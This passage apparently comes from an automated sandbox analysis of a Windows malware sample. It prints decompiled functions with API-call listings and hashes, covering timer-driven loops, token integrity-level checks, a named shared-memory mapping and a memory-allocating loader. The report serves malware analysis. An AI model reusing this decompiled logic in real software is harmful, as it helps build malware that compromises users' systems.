                  							L19:
                  							E00BB5DE8(_a4);
                  							if(_v12 == 0 || _v12 == 0x10d2) {
                  								goto L22;
                  							} else {
                  								goto L21;
                  							}
                  						}
                  						_v12 = _v12 & 0x00000000;
                  						goto L16;
                  					}
                  				}
                  			}






















































                  APIs
                  • GetTickCount.KERNEL32 ref: 00BB9DC4
                  • wsprintfA.USER32 ref: 00BB9E14
                  • wsprintfA.USER32 ref: 00BB9E31
                  • wsprintfA.USER32 ref: 00BB9E5D
                  • HeapFree.KERNEL32(00000000,?), ref: 00BB9E6F
                  • wsprintfA.USER32 ref: 00BB9E90
                  • HeapFree.KERNEL32(00000000,?), ref: 00BB9EA0
                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00BB9ECE
                  • GetTickCount.KERNEL32 ref: 00BB9EDF
                  • RtlEnterCriticalSection.NTDLL(03619570), ref: 00BB9EF3
                  • RtlLeaveCriticalSection.NTDLL(03619570), ref: 00BB9F11
                    • Part of subcall function 00BB61B9: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00BB6028,?,036195B0), ref: 00BB61E4
                    • Part of subcall function 00BB61B9: lstrlen.KERNEL32(?,?,?,00BB6028,?,036195B0), ref: 00BB61EC
                    • Part of subcall function 00BB61B9: strcpy.NTDLL ref: 00BB6203
                    • Part of subcall function 00BB61B9: lstrcat.KERNEL32(00000000,?), ref: 00BB620E
                    • Part of subcall function 00BB61B9: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00BB6028,?,036195B0), ref: 00BB622B
                  • StrTrimA.SHLWAPI(00000000,00BBC2AC,?,036195B0), ref: 00BB9F48
                    • Part of subcall function 00BBA755: lstrlen.KERNEL32(03619908,00000000,00000000,7742C740,00BB6053,00000000), ref: 00BBA765
                    • Part of subcall function 00BBA755: lstrlen.KERNEL32(?), ref: 00BBA76D
                    • Part of subcall function 00BBA755: lstrcpy.KERNEL32(00000000,03619908), ref: 00BBA781
                    • Part of subcall function 00BBA755: lstrcat.KERNEL32(00000000,?), ref: 00BBA78C
                  • lstrcpy.KERNEL32(00000000,?), ref: 00BB9F69
                  • lstrcpy.KERNEL32(?,?), ref: 00BB9F71
                  • lstrcat.KERNEL32(?,?), ref: 00BB9F7F
                  • lstrcat.KERNEL32(?,00000000), ref: 00BB9F85
                    • Part of subcall function 00BB8ECC: lstrlen.KERNEL32(?,00000000,00BBD330,00000001,00BB577D,00BBD00C,00BBD00C,00000000,00000005,00000000,00000000,?,?,?,00BB8880,00BB197C), ref: 00BB8ED5
                    • Part of subcall function 00BB8ECC: mbstowcs.NTDLL ref: 00BB8EFC
                    • Part of subcall function 00BB8ECC: memset.NTDLL ref: 00BB8F0E
                  • wcstombs.NTDLL ref: 00BBA018
                    • Part of subcall function 00BB1A34: SysAllocString.OLEAUT32(?), ref: 00BB1A6F
                    • Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4
                  • HeapFree.KERNEL32(00000000,?,?), ref: 00BBA059
                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BBA065
                  • HeapFree.KERNEL32(00000000,?,?,036195B0), ref: 00BBA071
                  • HeapFree.KERNEL32(00000000,?), ref: 00BBA07D
                  • HeapFree.KERNEL32(00000000,?), ref: 00BBA089
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                  • String ID:
                  • API String ID: 3748877296-0
                  • Opcode ID: 4262fe7f6a32533459b06d014cfbd39beef11feb7392ef8c223bba62db0e615d
                  • Instruction ID: 01e4d9c7eb7e7a2bd146ec3a4d18fc43a74950f31ae201099522fea5cab2ac45
                  • Opcode Fuzzy Hash: 4262fe7f6a32533459b06d014cfbd39beef11feb7392ef8c223bba62db0e615d
                  • Instruction Fuzzy Hash: 82915871900209EFCB11EFA8DC88AAE7BF9EF08310F5445A5F408E7261DBB5D951DB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 51%
                  			E00BBADA5(long _a4, long _a8) {
                  				signed int _v8;
                  				intOrPtr _v16;
                  				LONG* _v28;
                  				long _v40;
                  				long _v44;
                  				long _v48;
                  				CHAR* _v52;
                  				long _v56;
                  				CHAR* _v60;
                  				long _v64;
                  				signed int* _v68;
                  				char _v72;
                  				signed int _t76;
                  				signed int _t80;
                  				signed int _t81;
                  				intOrPtr* _t82;
                  				intOrPtr* _t83;
                  				intOrPtr* _t85;
                  				intOrPtr* _t90;
                  				intOrPtr* _t95;
                  				intOrPtr* _t98;
                  				struct HINSTANCE__* _t99;
                  				void* _t102;
                  				intOrPtr* _t104;
                  				void* _t115;
                  				long _t116;
                  				void _t125;
                  				void* _t131;
                  				signed short _t133;
                  				struct HINSTANCE__* _t138;
                  				signed int* _t139;
                  
                  				_t139 = _a4;
                  				_v28 = _t139[2] + 0xbb0000;
                  				_t115 = _t139[3] + 0xbb0000;
                  				_t131 = _t139[4] + 0xbb0000;
                  				_v8 = _t139[7];
                  				_v60 = _t139[1] + 0xbb0000;
                  				_v16 = _t139[5] + 0xbb0000;
                  				_v64 = _a8;
                  				_v72 = 0x24;
                  				_v68 = _t139;
                  				_v56 = 0;
                  				asm("stosd");
                  				_v48 = 0;
                  				_v44 = 0;
                  				_v40 = 0;
                  				if(( *_t139 & 0x00000001) == 0) {
                  					_a8 =  &_v72;
                  					RaiseException(0xc06d0057, 0, 1,  &_a8);
                  					return 0;
                  				}
                  				_t138 =  *_v28;
                  				_t76 = _a8 - _t115 >> 2 << 2;
                  				_t133 =  *(_t131 + _t76);
                  				_a4 = _t76;
                  				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                  				_v56 = _t80;
                  				_t81 = _t133 + 0xbb0002;
                  				if(_t80 == 0) {
                  					_t81 = _t133 & 0x0000ffff;
                  				}
                  				_v52 = _t81;
                  				_t82 =  *0xbbd1a0; // 0x0
                  				_t116 = 0;
                  				if(_t82 == 0) {
                  					L6:
                  					if(_t138 != 0) {
                  						L18:
                  						_t83 =  *0xbbd1a0; // 0x0
                  						_v48 = _t138;
                  						if(_t83 != 0) {
                  							_t116 =  *_t83(2,  &_v72);
                  						}
                  						if(_t116 != 0) {
                  							L32:
                  							 *_a8 = _t116;
                  							L33:
                  							_t85 =  *0xbbd1a0; // 0x0
                  							if(_t85 != 0) {
                  								_v40 = _v40 & 0x00000000;
                  								_v48 = _t138;
                  								_v44 = _t116;
                  								 *_t85(5,  &_v72);
                  							}
                  							return _t116;
                  						} else {
                  							if(_t139[5] == _t116 || _t139[7] == _t116) {
                  								L27:
                  								_t116 = GetProcAddress(_t138, _v52);
                  								if(_t116 == 0) {
                  									_v40 = GetLastError();
                  									_t90 =  *0xbbd19c; // 0x0
                  									if(_t90 != 0) {
                  										_t116 =  *_t90(4,  &_v72);
                  									}
                  									if(_t116 == 0) {
                  										_a4 =  &_v72;
                  										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                  										_t116 = _v44;
                  									}
                  								}
                  								goto L32;
                  							} else {
                  								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                  								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                  									_t116 =  *(_a4 + _v16);
                  									if(_t116 != 0) {
                  										goto L32;
                  									}
                  								}
                  								goto L27;
                  							}
                  						}
                  					}
                  					_t98 =  *0xbbd1a0; // 0x0
                  					if(_t98 == 0) {
                  						L9:
                  						_t99 = LoadLibraryA(_v60); // executed
                  						_t138 = _t99;
                  						if(_t138 != 0) {
                  							L13:
                  							if(InterlockedExchange(_v28, _t138) == _t138) {
                  								FreeLibrary(_t138);
                  							} else {
                  								if(_t139[6] != 0) {
                  									_t102 = LocalAlloc(0x40, 8);
                  									if(_t102 != 0) {
                  										 *(_t102 + 4) = _t139;
                  										_t125 =  *0xbbd198; // 0x0
                  										 *_t102 = _t125;
                  										 *0xbbd198 = _t102;
                  									}
                  								}
                  							}
                  							goto L18;
                  						}
                  						_v40 = GetLastError();
                  						_t104 =  *0xbbd19c; // 0x0
                  						if(_t104 == 0) {
                  							L12:
                  							_a8 =  &_v72;
                  							RaiseException(0xc06d007e, 0, 1,  &_a8);
                  							return _v44;
                  						}
                  						_t138 =  *_t104(3,  &_v72);
                  						if(_t138 != 0) {
                  							goto L13;
                  						}
                  						goto L12;
                  					}
                  					_t138 =  *_t98(1,  &_v72);
                  					if(_t138 != 0) {
                  						goto L13;
                  					}
                  					goto L9;
                  				}
                  				_t116 =  *_t82(0,  &_v72);
                  				if(_t116 != 0) {
                  					goto L33;
                  				}
                  				goto L6;
                  			}

                  APIs
                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBAE1E
                  • LoadLibraryA.KERNELBASE(?), ref: 00BBAE9B
                  • GetLastError.KERNEL32 ref: 00BBAEA7
                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00BBAEDA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                  • String ID: $
                  • API String ID: 948315288-3993045852
                  • Opcode ID: 7e690f6327aa644830fbebe9756c8f1bd0412c61516c390be36c59b0f3044eed
                  • Instruction ID: 730fc633fb22095ab07e310e2f1c90e00c0eb623fdc8eadc7b774381170878c6
                  • Opcode Fuzzy Hash: 7e690f6327aa644830fbebe9756c8f1bd0412c61516c390be36c59b0f3044eed
                  • Instruction Fuzzy Hash: 7A8139B1A00609AFDB11DFA8D890BFEBBF5EF58700F508169E905E7250EBB0E905CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E00BB7780(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                  				struct %anon52 _v8;
                  				long _v12;
                  				char _v16;
                  				char _v20;
                  				signed int _v24;
                  				intOrPtr _v32;
                  				union _LARGE_INTEGER _v36;
                  				intOrPtr _v40;
                  				void* _v44;
                  				void _v88;
                  				char _v92;
                  				struct %anon52 _t46;
                  				intOrPtr _t51;
                  				long _t53;
                  				void* _t54;
                  				struct %anon52 _t60;
                  				long _t64;
                  				signed int _t65;
                  				void* _t68;
                  				void* _t70;
                  				signed int _t71;
                  				intOrPtr _t73;
                  				intOrPtr _t76;
                  				void** _t78;
                  				void* _t80;
                  
                  				_t73 = __edx;
                  				_v92 = 0;
                  				memset( &_v88, 0, 0x2c);
                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                  				_v44 = _t46;
                  				if(_t46 == 0) {
                  					_v8.LowPart = GetLastError();
                  				} else {
                  					_push(0xffffffff);
                  					_push(0xff676980);
                  					_push(0);
                  					_push( *0xbbd240);
                  					_v20 = 0;
                  					_v16 = 0;
                  					L00BBB088();
                  					_v36.LowPart = _t46;
                  					_v32 = _t73;
                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                  					_t51 =  *0xbbd26c; // 0x1ec
                  					_v40 = _t51;
                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                  					_v8.LowPart = _t53;
                  					if(_t53 == 0) {
                  						if(_a8 != 0) {
                  							L4:
                  							 *0xbbd24c = 5;
                  						} else {
                  							_t68 = E00BB86F0(_t73); // executed
                  							if(_t68 != 0) {
                  								goto L4;
                  							}
                  						}
                  						_v12 = 0;
                  						L6:
                  						L6:
                  						if(_v12 == 1 && ( *0xbbd260 & 0x00000001) == 0) {
                  							_v12 = 2;
                  						}
                  						_t71 = _v12;
                  						_t58 = _t71 << 4;
                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                  						_t72 = _t71 + 1;
                  						_v24 = _t71 + 1;
                  						_t60 = E00BB9958(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                  						_v8.LowPart = _t60;
                  						if(_t60 != 0) {
                  							goto L17;
                  						}
                  						_t65 = _v24;
                  						_v12 = _t65;
                  						_t90 = _t65 - 3;
                  						if(_t65 != 3) {
                  							goto L6;
                  						} else {
                  							_v8.LowPart = E00BBA79A(_t72, _t90,  &_v92, _a4, _a8);
                  						}
                  						goto L12;
                  						L17:
                  						__eflags = _t60 - 0x10d2;
                  						if(_t60 != 0x10d2) {
                  							_push(0xffffffff);
                  							_push(0xff676980);
                  							_push(0);
                  							_push( *0xbbd244);
                  							goto L21;
                  						} else {
                  							__eflags =  *0xbbd248; // 0x0
                  							if(__eflags == 0) {
                  								goto L12;
                  							} else {
                  								_t60 = E00BB14EF();
                  								_push(0xffffffff);
                  								_push(0xdc3cba00);
                  								_push(0);
                  								_push( *0xbbd248);
                  								L21:
                  								L00BBB088();
                  								_v36.LowPart = _t60;
                  								_v32 = _t76;
                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                  								_v8.LowPart = _t64;
                  								__eflags = _t64;
                  								if(_t64 == 0) {
                  									goto L6;
                  								} else {
                  									goto L12;
                  								}
                  							}
                  						}
                  						L25:
                  					}
                  					L12:
                  					_t78 =  &_v92;
                  					_t70 = 3;
                  					do {
                  						_t54 =  *_t78;
                  						if(_t54 != 0) {
                  							HeapFree( *0xbbd238, 0, _t54);
                  						}
                  						_t78 =  &(_t78[4]);
                  						_t70 = _t70 - 1;
                  					} while (_t70 != 0);
                  					CloseHandle(_v44);
                  				}
                  				return _v8;
                  				goto L25;
                  			}

                  APIs
                  • memset.NTDLL ref: 00BB7795
                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00BB77A1
                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00BB77C6
                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00BB77E2
                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00BB77FB
                  • HeapFree.KERNEL32(00000000,00000000), ref: 00BB7891
                  • CloseHandle.KERNEL32(?), ref: 00BB78A0
                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00BB78DA
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00BB19AA,?), ref: 00BB78F0
                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00BB78FB
                    • Part of subcall function 00BB86F0: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03619388,00000000,?,74B5F710,00000000,74B5F730), ref: 00BB873F
                    • Part of subcall function 00BB86F0: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,036193C0,?,00000000,30314549,00000014,004F0053,0361937C), ref: 00BB87DC
                    • Part of subcall function 00BB86F0: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00BB780E), ref: 00BB87EE
                  • GetLastError.KERNEL32 ref: 00BB790D
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                  • String ID:
                  • API String ID: 3521023985-0
                  • Opcode ID: 095f8fc4eb0b5a09a8857c9af1f787ca9d835dc59df5bb961e919794e62e4cf3
                  • Instruction ID: f0085cdcba6937400c5dc7e9c4e2ef354af77a878b2ec3cbc59235dc371b6ab3
                  • Opcode Fuzzy Hash: 095f8fc4eb0b5a09a8857c9af1f787ca9d835dc59df5bb961e919794e62e4cf3
                  • Instruction Fuzzy Hash: CD513C71805228ABCF11EF95DC48DFEBFB8EF49720F204665F515A3190DBB48A44DBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E6E0C1D6E(char _a4) {
                  				long _v8;
                  				struct _SYSTEMTIME _v24;
                  				char _v48;
                  				void* __edi;
                  				long _t20;
                  				int _t22;
                  				long _t25;
                  				long _t26;
                  				long _t30;
                  				void* _t36;
                  				intOrPtr _t38;
                  				intOrPtr _t43;
                  				signed int _t44;
                  				void* _t48;
                  				signed int _t51;
                  				void* _t54;
                  				intOrPtr* _t55;
                  
                  				_t20 = E6E0C1800();
                  				_v8 = _t20;
                  				if(_t20 != 0) {
                  					return _t20;
                  				}
                  				do {
                  					GetSystemTime( &_v24);
                  					_t22 = SwitchToThread();
                  					asm("cdq");
                  					_t44 = 9;
                  					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
                  					_t25 = E6E0C1C4E(0, _t51); // executed
                  					_v8 = _t25;
                  					Sleep(_t51 << 5); // executed
                  					_t26 = _v8;
                  				} while (_t26 == 0xc);
                  				if(_t26 != 0) {
                  					L18:
                  					return _t26;
                  				}
                  				if(_a4 != 0) {
                  					L11:
                  					_push(0);
                  					_t54 = E6E0C1F56(E6E0C1718,  &_v48);
                  					if(_t54 == 0) {
                  						_v8 = GetLastError();
                  					} else {
                  						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                  						_v8 = _t30;
                  						if(_t30 == 0) {
                  							GetExitCodeThread(_t54,  &_v8);
                  						}
                  						CloseHandle(_t54);
                  					}
                  					_t26 = _v8;
                  					if(_t26 == 0xffffffff) {
                  						_t26 = GetLastError();
                  					}
                  					goto L18;
                  				}
                  				if(E6E0C12E5(_t44,  &_a4) != 0) {
                  					 *0x6e0c4138 = 0;
                  					goto L11;
                  				}
                  				_t43 = _a4;
                  				_t55 = __imp__GetLongPathNameW;
                  				_t36 =  *_t55(_t43, 0, 0); // executed
                  				_t48 = _t36;
                  				if(_t48 == 0) {
                  					L9:
                  					 *0x6e0c4138 = _t43;
                  					goto L11;
                  				}
                  				_t14 = _t48 + 2; // 0x2
                  				_t38 = E6E0C1072(_t48 + _t14);
                  				 *0x6e0c4138 = _t38;
                  				if(_t38 == 0) {
                  					goto L9;
                  				}
                  				 *_t55(_t43, _t38, _t48); // executed
                  				E6E0C105D(_t43);
                  				goto L11;
                  			}





















                  APIs
                    • Part of subcall function 6E0C1800: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0C1D7A,74B063F0), ref: 6E0C180F
                    • Part of subcall function 6E0C1800: GetVersion.KERNEL32 ref: 6E0C181E
                    • Part of subcall function 6E0C1800: GetCurrentProcessId.KERNEL32 ref: 6E0C183A
                    • Part of subcall function 6E0C1800: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0C1853
                  • GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 6E0C1D8C
                  • SwitchToThread.KERNEL32 ref: 6E0C1D92
                    • Part of subcall function 6E0C1C4E: VirtualAlloc.KERNELBASE(00000000,6E0C1DAC,00003000,00000004,?,?,6E0C1DAC,00000000), ref: 6E0C1CA4
                    • Part of subcall function 6E0C1C4E: memcpy.NTDLL(?,?,6E0C1DAC,?,?,6E0C1DAC,00000000), ref: 6E0C1D3B
                    • Part of subcall function 6E0C1C4E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E0C1DAC,00000000), ref: 6E0C1D56
                  • Sleep.KERNELBASE(00000000,00000000), ref: 6E0C1DB3
                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E0C1DE8
                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E0C1E06
                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E0C1E3E
                  • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E0C1E50
                  • CloseHandle.KERNEL32(00000000), ref: 6E0C1E57
                  • GetLastError.KERNEL32(?,00000000), ref: 6E0C1E5F
                  • GetLastError.KERNEL32 ref: 6E0C1E6C
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                  • String ID:
                  • API String ID: 2280543912-0
                  • Opcode ID: 45cca0821cae5d9d007321f6ad584a0eddd25e94eb50e80913b7cfa44a547786
                  • Instruction ID: bfe9e3664e19f775661fb591bbe2e7fc2463378abd4d40db8c3616211e8ab59a
                  • Opcode Fuzzy Hash: 45cca0821cae5d9d007321f6ad584a0eddd25e94eb50e80913b7cfa44a547786
                  • Instruction Fuzzy Hash: D3318676910615BBCB01DBF58C5CA9F76FDAF4AF507200552F914D3148E734DA088B62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00BB165F(intOrPtr __edx, void** _a4, void** _a8) {
                  				intOrPtr _v8;
                  				struct _FILETIME* _v12;
                  				short _v56;
                  				struct _FILETIME* _t12;
                  				intOrPtr _t13;
                  				void* _t17;
                  				void* _t21;
                  				intOrPtr _t27;
                  				long _t28;
                  				void* _t30;
                  
                  				_t27 = __edx;
                  				_t12 =  &_v12;
                  				GetSystemTimeAsFileTime(_t12);
                  				_push(0x192);
                  				_push(0x54d38000);
                  				_push(_v8);
                  				_push(_v12);
                  				L00BBB082();
                  				_push(_t12);
                  				_v12 = _t12;
                  				_t13 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t5 = _t13 + 0xbbe862; // 0x3618e0a
                  				_t6 = _t13 + 0xbbe59c; // 0x530025
                  				_push(0x16);
                  				_push( &_v56);
                  				_v8 = _t27;
                  				L00BBAD1A();
                  				_t17 = CreateFileMappingW(0xffffffff, 0xbbd2a8, 4, 0, 0x1000,  &_v56); // executed
                  				_t30 = _t17;
                  				if(_t30 == 0) {
                  					_t28 = GetLastError();
                  				} else {
                  					if(GetLastError() == 0xb7) {
                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                  						if(_t21 == 0) {
                  							_t28 = GetLastError();
                  							if(_t28 != 0) {
                  								goto L6;
                  							}
                  						} else {
                  							 *_a4 = _t30;
                  							 *_a8 = _t21;
                  							_t28 = 0;
                  						}
                  					} else {
                  						_t28 = 2;
                  						L6:
                  						CloseHandle(_t30);
                  					}
                  				}
                  				return _t28;
                  			}














                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00BB187D,?,?,4D283A53,?,?), ref: 00BB166B
                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00BB1681
                  • _snwprintf.NTDLL ref: 00BB16A6
                  • CreateFileMappingW.KERNELBASE(000000FF,00BBD2A8,00000004,00000000,00001000,?), ref: 00BB16C2
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00BB187D,?,?,4D283A53), ref: 00BB16D4
                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00BB16EB
                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00BB187D,?,?), ref: 00BB170C
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00BB187D,?,?,4D283A53), ref: 00BB1714
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                  • String ID:
                  • API String ID: 1814172918-0
                  • Opcode ID: 9e2a53a3ec7aac5f06939f392bd5a432b996cbfba3baaa92cc77e6d2a6a40683
                  • Instruction ID: e75fc136c066b9c4baf1defde55dfff1101a262b28a3183fe3554eb1cfdeee38
                  • Opcode Fuzzy Hash: 9e2a53a3ec7aac5f06939f392bd5a432b996cbfba3baaa92cc77e6d2a6a40683
                  • Instruction Fuzzy Hash: F9218176640204BBD711EFA9CC59FEA7BE9EB44710F6502A1F505E7190DBF0DA058B50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BB21C5(long* _a4) {
                  				long _v8;
                  				void* _v12;
                  				void _v16;
                  				long _v20;
                  				int _t33;
                  				void* _t46;
                  
                  				_v16 = 1;
                  				_v20 = 0x2000;
                  				if( *0xbbd25c > 5) {
                  					_v16 = 0;
                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                  						_v8 = 0;
                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                  						if(_v8 != 0) {
                  							_t46 = E00BB98E4(_v8);
                  							if(_t46 != 0) {
                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                  								if(_t33 != 0) {
                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                  								}
                  								E00BB5DE8(_t46);
                  							}
                  						}
                  						CloseHandle(_v12);
                  					}
                  				}
                  				 *_a4 = _v20;
                  				return _v16;
                  			}










                  APIs
                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00BB21F7
                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00BB2217
                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00BB2227
                  • CloseHandle.KERNEL32(00000000), ref: 00BB2277
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00BB224A
                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00BB2252
                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00BB2262
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                  • String ID:
                  • API String ID: 1295030180-0
                  • Opcode ID: 65756847adeca8899d8954971133a947bf7e623221dcbd3dba00b019e24f1a15
                  • Instruction ID: 0a7ac7a0ed2624fb071b896dac740f59aba13c697aec668f8d60ef4bf4147e3d
                  • Opcode Fuzzy Hash: 65756847adeca8899d8954971133a947bf7e623221dcbd3dba00b019e24f1a15
                  • Instruction Fuzzy Hash: A0212A7590424DFFEF01AFA4DC44EEEBBB9EB48304F1001A5E910A6261DBB58E45EF60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E6E0C1879(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                  				intOrPtr _v8;
                  				_Unknown_base(*)()* _t29;
                  				_Unknown_base(*)()* _t33;
                  				_Unknown_base(*)()* _t36;
                  				_Unknown_base(*)()* _t39;
                  				_Unknown_base(*)()* _t42;
                  				intOrPtr _t46;
                  				struct HINSTANCE__* _t50;
                  				intOrPtr _t56;
                  
                  				_t56 = E6E0C1072(0x20);
                  				if(_t56 == 0) {
                  					_v8 = 8;
                  				} else {
                  					_t50 = GetModuleHandleA( *0x6e0c4144 + 0x6e0c5014);
                  					_v8 = 0x7f;
                  					_t29 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c5151);
                  					 *(_t56 + 0xc) = _t29;
                  					if(_t29 == 0) {
